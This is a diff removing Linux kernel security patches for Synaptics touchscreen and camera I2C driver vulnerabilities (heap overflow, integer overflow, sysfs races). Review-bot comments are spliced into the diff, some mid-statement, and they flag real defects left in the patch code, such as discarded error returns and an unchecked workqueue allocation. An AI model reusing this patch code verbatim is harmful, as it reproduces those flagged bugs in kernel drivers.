-@@ -106,7 +121,7 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- uint32_t addr, uint8_t *data, uint32_t num_byte)
- {
- int32_t rc = -EFAULT;
-- unsigned char buf[client->addr_type+num_byte];
-+ unsigned char *buf = NULL;
- int i;
-
- if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
-@@ -114,6 +129,22 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- || num_byte == 0)
- return rc;
-
-+ if (num_byte > I2C_REG_DATA_MAX) {
-+ pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+ __func__, num_byte, I2C_REG_DATA_MAX);
-+ return rc;
-+ }
-+ if (client->addr_type > UINT_MAX - num_byte) {
-+ pr_err("%s: integer overflow prevented\n", __func__);
-+ return rc;
-+ }
-+
-+ buf = kzalloc(client->addr_type+num_byte, GFP_KERNEL);
-+ if (!buf) {
-+ pr_err("%s:%d no memory\n", __func__, __LINE__);
-+ return -ENOMEM;
-+ }
-+
- if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- buf[0] = addr;
- } else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -123,6 +154,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- rc = msm_camera_qup_i2c_rxdata(client, buf, num_byte);
- if (rc < 0) {
- S_I2C_DBG("%s fail\n", __func__);
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
-@@ -132,6 +165,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- S_I2C_DBG("Byte %d: 0x%x\n", i, buf[i]);
- S_I2C_DBG("Data: 0x%x\n", data[i]);
- }
-+ kfree(buf);
-+ buf = NULL;
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6742/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6742/ANY/0001.patch
deleted file mode 100644
index 9c676bce..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6742/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 94f4b81da69ec72486476adb59d7c818bd4ffbd0 Mon Sep 17 00:00:00 2001
-From: chengengjia
-Date: Wed, 10 Aug 2016 17:34:43 +0800
-Subject: [PATCH] input: synaptics: Add checks of user input data
-
-Add checks of the user input count to avoid possible heap overflow
-
-Bug: 30799828
-Change-Id: I896492b18c4ace6565fb9edd5cbf51f363ce157b
-Signed-off-by: chengengjia
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/synaptics_fw_update.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 8e457ccaa5245..170a202590ad4 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -1736,6 +1736,13 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file,
- return -EAGAIN;
- }
-
-+ if (count > fwu->image_size - fwu->data_pos) {
-+ dev_err(&fwu->rmi4_data->i2c_client->dev,
-+ "%s: Not enough space in buffer\n",
-+ __func__);
-+ return -EINVAL;
-+ }
-+
- memcpy((void *)(&fwu->ext_data_source[fwu->data_pos]),
- (const void *)buf,
- count);
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0001.patch
deleted file mode 100644
index dcdb4835..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 80dd4267f644c7ba9657df52f6bce42f0bef1b4e Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Wed, 14 Sep 2016 15:25:23 -0700
-Subject: [PATCH] input: synaptics: defer sysfs creation during init
-
-sysfs entries are created which reference fwu->fwu_work.
-defer the creation of these sysfs entries until the end of the init
-function, after fwu->fwu_work has been initialized.
-
-Change-Id: Ib7d5304ec2990454486e2b1d28b640a174c83d12
-Bug: 31252388
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/synaptics_fw_update.c | 28 ++++++++++++-------------
- 1 file changed, 14 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 170a202590ad4..79b3a780550b8 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -2325,7 +2325,20 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- fwu->initialized = true;
- fwu->polling_mode = false;
-
-- retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
-+ fwu->ts_info = kzalloc(RMI4_INFO_MAX_LEN, GFP_KERNEL);
-+ if (!fwu->ts_info) {
-+ dev_err(&rmi4_data->i2c_client->dev, "Not enough memory\n");
-+ goto exit_free_ts_info;
-+ }
-+
-+ synaptics_rmi4_update_debug_info();
-+
-+#ifdef INSIDE_FIRMWARE_UPDATE
-+ fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue");
-+ INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
-+#endif
-+
-+ retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- &dev_attr_data);
- if (retval < 0) {
- dev_err(&rmi4_data->i2c_client->dev,
-@@ -2357,19 +2370,6 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- goto exit_remove_attrs;
- }
-
-- fwu->ts_info = kzalloc(RMI4_INFO_MAX_LEN, GFP_KERNEL);
-- if (!fwu->ts_info) {
-- dev_err(&rmi4_data->i2c_client->dev, "Not enough memory\n");
-- goto exit_free_ts_info;
-- }
--
-- synaptics_rmi4_update_debug_info();
--
--#ifdef INSIDE_FIRMWARE_UPDATE
-- fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue");
-- INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
--#endif
--
- return 0;
- exit_free_ts_info:
- debugfs_remove(temp);
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0002.patch
deleted file mode 100644
index e2c7abee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0002.patch
+++ /dev/null
@@ -1,444 +0,0 @@ -From 9397e20764da2fdffdfe20e35cb78211753b83cc Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Wed, 14 Sep 2016 17:21:48 -0700 -Subject: [PATCH] input: synaptics: prevent sysfs races - -concurrent sysfs calls on the fw updater can cause -ugly race conditions. Return EBUSY on concurrent sysfs calls. - -For sysfs calls which generate deferred work, prevent -the deferred work from running concurrently with other -sysfs calls. - -Change-Id: Ie33add946fbcca8309998e4cb7cb01525c667c7e -Signed-off-by: Andrew Chant -Bug: 31252388 ---- - drivers/input/touchscreen/synaptics_fw_update.c | 144 ++++++++++++++++++------ - 1 file changed, 109 insertions(+), 35 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c -index 79b3a780550b8..ffa992b829a5a 100644 ---- a/drivers/input/touchscreen/synaptics_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_fw_update.c -@@ -22,6 +22,7 @@ - #include - #include - #include -+#include - #include - #include - #include -@@ -296,6 +297,7 @@ struct synaptics_rmi4_fwu_handle { - static struct synaptics_rmi4_fwu_handle *fwu; - - DECLARE_COMPLETION(fwu_remove_complete); -+DEFINE_MUTEX(fwu_sysfs_mutex); - - static unsigned int extract_uint(const unsigned char *ptr) - { -@@ -1713,34 +1715,47 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file, - char *buf, loff_t pos, size_t count) - { - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -+ ssize_t retval; -+ -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - - if (count < fwu->config_size) { - dev_err(&rmi4_data->i2c_client->dev, - "%s: Not enough space (%zu bytes) in buffer\n", - __func__, count); -- return -EINVAL; -+ retval = -EINVAL; -+ goto show_image_exit; - } - - memcpy(buf, fwu->read_config_buf, fwu->config_size); -- -- return fwu->config_size; -+ retval = fwu->config_size; -+show_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t 
fwu_sysfs_store_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) - { -+ ssize_t retval; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (!fwu->ext_data_source) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot use this without setting imagesize!\n"); -- return -EAGAIN; -+ retval = -EAGAIN; -+ goto store_image_exit; - } - - if (count > fwu->image_size - fwu->data_pos) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "%s: Not enough space in buffer\n", - __func__); -- return -EINVAL; -+ retval = -EINVAL; -+ goto store_image_exit; - } - - memcpy((void *)(&fwu->ext_data_source[fwu->data_pos]), -@@ -1749,8 +1764,11 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file, - - fwu->data_buffer = fwu->ext_data_source; - fwu->data_pos += count; -+ retval = count; - -- return count; -+store_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_image_name_store(struct device *dev, -@@ -1758,11 +1776,15 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - { - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - char *strptr; -+ ssize_t retval; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - - if (count >= NAME_BUFFER_SIZE) { - dev_err(&rmi4_data->i2c_client->dev, - "Input over %d characters long\n", NAME_BUFFER_SIZE); -- return -EINVAL; -+ retval = -EINVAL; -+ goto image_name_store_exit; - } - - strptr = strnstr(buf, ".img", -@@ -1770,21 +1792,32 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - if (!strptr) { - dev_err(&rmi4_data->i2c_client->dev, - "Input is not valid .img file\n"); -- return -EINVAL; -+ retval = -EINVAL; -+ goto image_name_store_exit; - } - - strlcpy(rmi4_data->fw_image_name, buf, count); -- return count; -+ retval = count; -+ -+image_name_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_image_name_show(struct 
device *dev, - struct device_attribute *attr, char *buf) - { -+ ssize_t retval; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - if (strnlen(fwu->rmi4_data->fw_image_name, NAME_BUFFER_SIZE) > 0) -- return snprintf(buf, PAGE_SIZE, "%s\n", -+ retval = snprintf(buf, PAGE_SIZE, "%s\n", - fwu->rmi4_data->fw_image_name); - else -- return snprintf(buf, PAGE_SIZE, "No firmware name given\n"); -+ retval = snprintf(buf, PAGE_SIZE, "No firmware name given\n"); -+ -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_force_reflash_store(struct device *dev, -@@ -1794,14 +1827,17 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto force_reflash_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto force_reflash_store_exit; - } - if (LOCKDOWN) - fwu->do_lockdown = true; -@@ -1812,16 +1848,18 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to do reflash\n", - __func__); -- goto exit; -+ goto force_reflash_store_free_exit; - } - - retval = count; - --exit: -+force_reflash_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->force_update = FORCE_UPDATE; - fwu->do_lockdown = rmi4_data->board->do_lockdown; -+force_reflash_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1832,9 +1870,12 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - if (input & LOCKDOWN) { -@@ -1844,7 +1885,7 @@ 
static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - - if ((input != NORMAL) && (input != FORCE)) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - if (input == FORCE) -@@ -1855,16 +1896,18 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to do reflash\n", - __func__); -- goto exit; -+ goto reflash_store_free_exit; - } - - retval = count; - --exit: -+reflash_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->force_update = FORCE_UPDATE; - fwu->do_lockdown = rmi4_data->board->do_lockdown; -+reflash_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1875,26 +1918,31 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto lockdown_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto lockdown_store_exit; - } - - if (!fwu->ext_data_source) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot use this without loading image in manual way!\n"); -- return -EAGAIN; -+ retval = -EAGAIN; -+ goto lockdown_store_exit; - } - - if (fwu->rmi4_data->suspended == true) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot lockdown while device is in suspend\n"); -- return -EBUSY; -+ retval = -EBUSY; -+ goto lockdown_store_exit; - } - - retval = fwu_start_write_lockdown(); -@@ -1902,16 +1950,18 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to write lockdown block\n", - __func__); -- goto exit; -+ goto lockdown_store_free_exit; - } - - retval = count; - --exit: -+lockdown_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->force_update = FORCE_UPDATE; - 
fwu->do_lockdown = rmi4_data->board->do_lockdown; -+lockdown_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1920,6 +1970,8 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev, - { - unsigned int input = 0; - -+ /* Takes fwu_sysfs_mutex in the deferred work function. */ -+ - if (sscanf(buf, "%u", &input) != 1) - return -EINVAL; - -@@ -1942,26 +1994,31 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (!fwu->ext_data_source) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot use this without loading image in manual way!\n"); -- return -EAGAIN; -+ retval = -EAGAIN; -+ goto write_config_store_exit; - } - - if (fwu->rmi4_data->suspended == true) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot write config while device is in suspend\n"); -- return -EBUSY; -+ retval = -EBUSY; -+ goto write_config_store_exit; - } - - retval = fwu_start_write_config(); -@@ -1969,14 +2026,16 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to write config\n", - __func__); -- goto exit; -+ goto write_config_store_free_exit; - } - - retval = count; - --exit: -+write_config_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; -+write_config_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1999,7 +2058,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev, - return -EBUSY; - } - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - retval = fwu_do_read_config(); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (retval < 0) { - 
dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to read config\n", -@@ -2028,7 +2091,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev, - return -EINVAL; - } - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - fwu->config_area = config_area; -+ mutex_unlock(&fwu_sysfs_mutex); - - return count; - } -@@ -2039,10 +2105,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - int retval; - unsigned long size; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - - retval = kstrtoul(buf, 10, &size); - if (retval) -- return retval; -+ goto image_size_store_exit; - - fwu->image_size = size; - fwu->data_pos = 0; -@@ -2053,10 +2121,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to alloc mem for image data\n", - __func__); -- return -ENOMEM; -+ retval = -ENOMEM; - } - -- return count; -+image_size_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_block_size_show(struct device *dev, -@@ -2241,6 +2311,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work) - container_of(to_delayed_work(work), - struct synaptics_rmi4_fwu_handle, fwu_work); - -+ mutex_lock(&fwu_sysfs_mutex); -+ - if (fwu->fn_ptr->enable) - fwu->fn_ptr->enable(fwu->rmi4_data, false); - -@@ -2248,6 +2320,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work) - - if (fwu->fn_ptr->enable) - fwu->fn_ptr->enable(fwu->rmi4_data, true); -+ -+ mutex_unlock(&fwu_sysfs_mutex); - } - - static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) -@@ -2338,7 +2412,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work); - #endif - -- retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj, -+ retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj, - 
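Review bot: In the second `fwu_sysfs_image_size_store` hunk the success path now falls through to `return retval;`, but nothing visible sets `retval` to `count`. It still holds the 0 returned by `kstrtoul()`, unless the four lines between the two hunks assign it. A sysfs store that returns 0 reports that no bytes were consumed, so a writer will usually retry the same data. Give the allocation check a success branch, `} else { retval = count; }`, which is how the 0004.patch version of this function on this page handles it. `retval` is also still declared `int` here while the handler returns `ssize_t`; the other handlers in this patch switch to `ssize_t retval;`.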
&dev_attr_data); - if (retval < 0) { - dev_err(&rmi4_data->i2c_client->dev, diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0003.patch deleted file mode 100644 index 3002fc01..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0003.patch +++ /dev/null 
@@ -1,71 +0,0 @@ -From 8667cc5ed59b7a4b64d82d8014bead09bddb1f76 Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Wed, 14 Sep 2016 19:28:37 -0700 -Subject: [PATCH] input: synaptics: defer sysfs creation during init - -sysfs entries are created which reference fwu->fwu_work. -defer the creation of these sysfs entries until the end of the init -function, after fwu->fwu_work has been initialized. - -Change-Id: I89bdf0088f98b4513d3f3c3c95ae967584dc5171 -Bug: 31252388 -Signed-off-by: Andrew Chant ---- - .../synaptics_dsx25/synaptics_dsx_fw_update.c | 25 ++++++++++++++-------- - 1 file changed, 16 insertions(+), 9 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -index 734baafa4cfa1..3edeaa22aa336 100755 ---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -@@ -4131,13 +4131,20 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - fwu->do_lockdown = DO_LOCKDOWN; - fwu->initialized = true; - -- retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj, -+#ifdef DO_STARTUP_FW_UPDATE -+ fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue"); -+ INIT_WORK(&fwu->fwu_work, fwu_startup_fw_update_work); -+ queue_work(fwu->fwu_workqueue, -+ &fwu->fwu_work); -+#endif -+ -+ retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj, - &dev_attr_data); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to create sysfs bin file\n", - __func__); -- goto exit_free_mem; -+ goto exit_destroy_work; - } - - for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) { -@@ -4152,13 +4159,6 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - } - } - --#ifdef DO_STARTUP_FW_UPDATE -- fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue"); -- INIT_WORK(&fwu->fwu_work, 
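Review bot: The result of `create_singlethread_workqueue("fwu_workqueue")` is not checked in the block that this hunk moves ahead of `sysfs_create_bin_file()`, so a failed allocation would hand a NULL workqueue to `queue_work()`. The new `exit_destroy_work:` label in the last hunk would then pass the same NULL to `flush_workqueue()` and `destroy_workqueue()`. Add a guard right after the create call, `if (!fwu->fwu_workqueue) { retval = -ENOMEM; goto exit_free_mem; }`, so that neither path sees a missing queue. `synaptics_rmi4_fwu_init` starts and ends outside the hunk, so any earlier handling of this case is not visible here.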
fwu_startup_fw_update_work); -- queue_work(fwu->fwu_workqueue, -- &fwu->fwu_work); --#endif -- - return 0; - - exit_remove_attrs: -@@ -4169,6 +4169,13 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); - -+exit_destroy_work: -+#ifdef DO_STARTUP_FW_UPDATE -+ cancel_work_sync(&fwu->fwu_work); -+ flush_workqueue(fwu->fwu_workqueue); -+ destroy_workqueue(fwu->fwu_workqueue); -+#endif -+ - exit_free_mem: - kfree(fwu->image_name); - diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0004.patch deleted file mode 100644 index 3b798db7..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0004.patch +++ /dev/null 
@@ -1,386 +0,0 @@ -From 19055017169363f176693c3e41ebdfc3c8e11ef4 Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Thu, 15 Sep 2016 12:10:56 -0700 -Subject: [PATCH] input: touchscreen: synaptics: prevent sysfs races - -Concurrent sysfs calls can cause ugly race conditions. -Return EBUSY on concurrent sysfs calls, and prevent sysfs calls -during initial fw load. - -Change-Id: I5e295c4cd7c3ba4b998de5b75f9b631679e7c39f -Signed-off-by: Andrew Chant -Bug: 31252388 ---- - .../synaptics_dsx25/synaptics_dsx_fw_update.c | 138 +++++++++++++++------ - 1 file changed, 99 insertions(+), 39 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -index 3edeaa22aa336..908693bd26a43 100755 ---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -@@ -20,6 +20,7 @@ - #include - #include - #include -+#include - #include - #include - #include -@@ -654,6 +655,7 @@ static struct device_attribute attrs[] = { - static struct synaptics_rmi4_fwu_handle *fwu; - - DECLARE_COMPLETION(dsx_fwu_remove_complete); -+DEFINE_MUTEX(fwu_sysfs_mutex); - - static bool tp_2k_panel = false; - /** -@@ -3719,14 +3721,18 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) - { -- int retval; -+ ssize_t retval; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (count < fwu->config_size) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Not enough space (%zu bytes) in buffer\n", - __func__, count); -- return -EINVAL; -+ retval = -EINVAL; -+ goto show_image_exit; - } - - retval = secure_memcpy(buf, count, fwu->read_config_buf, -@@ -3735,43 +3741,56 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file, - 
dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to copy config data\n", - __func__); -- return retval; -+ goto show_image_exit; - } - -- return fwu->config_size; -+ retval = fwu->config_size; -+ -+show_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_store_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) - { -- int retval; -+ ssize_t retval; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - retval = secure_memcpy(&fwu->ext_data_source[fwu->data_pos], - fwu->image_size - fwu->data_pos, buf, count, count); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to copy image data\n", - __func__); -- return retval; -+ goto store_image_exit; - } - - fwu->data_pos += count; -+ retval = count; - -+store_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return count; - } - - static ssize_t fwu_sysfs_do_recovery_store(struct device *dev, - struct device_attribute *attr, const char *buf, size_t count) - { -- int retval; -+ ssize_t retval; - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto recovery_store_exit; - } - - if (!fwu->in_ub_mode) { -@@ -3779,28 +3798,32 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev, - "%s: Not in microbootloader mode\n", - __func__); - retval = -EINVAL; -- goto exit; -+ goto recovery_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -- else -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto recovery_store_exit; -+ } else { - fwu->image = fwu->ext_data_source; -+ } - - retval = fwu_start_recovery(); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to do recovery\n", - __func__); -- goto exit; 
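Review bot: `fwu_sysfs_store_image` still ends in the unchanged context line `return count;` after the new `store_image_exit:` label, so the error that `secure_memcpy()` leaves in `retval` is discarded. The write is then reported as fully accepted even though the `goto` skipped `fwu->data_pos += count`, and user space has no indication that the staged firmware image is missing that chunk. The final statement should be `return retval;`, matching `fwu_sysfs_show_image` in this same hunk and the 0005.patch version of this function further down the page.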
-+ goto recovery_store_free_exit; - } - - retval = count; - --exit: -+recovery_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; -+recovery_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -3811,15 +3834,20 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -- else -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto reflash_store_exit; -+ } else { - fwu->image = fwu->ext_data_source; -+ } - - if (input & LOCKDOWN) { - fwu->do_lockdown = true; -@@ -3828,7 +3856,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - - if ((input != NORMAL) && (input != FORCE)) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - if (input == FORCE) -@@ -3839,17 +3867,19 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to do reflash\n", - __func__); -- goto exit; -+ goto reflash_store_free_exit; - } - - retval = count; - --exit: -+reflash_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; - fwu->force_update = FORCE_UPDATE; - fwu->do_lockdown = DO_LOCKDOWN; -+reflash_store_exit: -+ 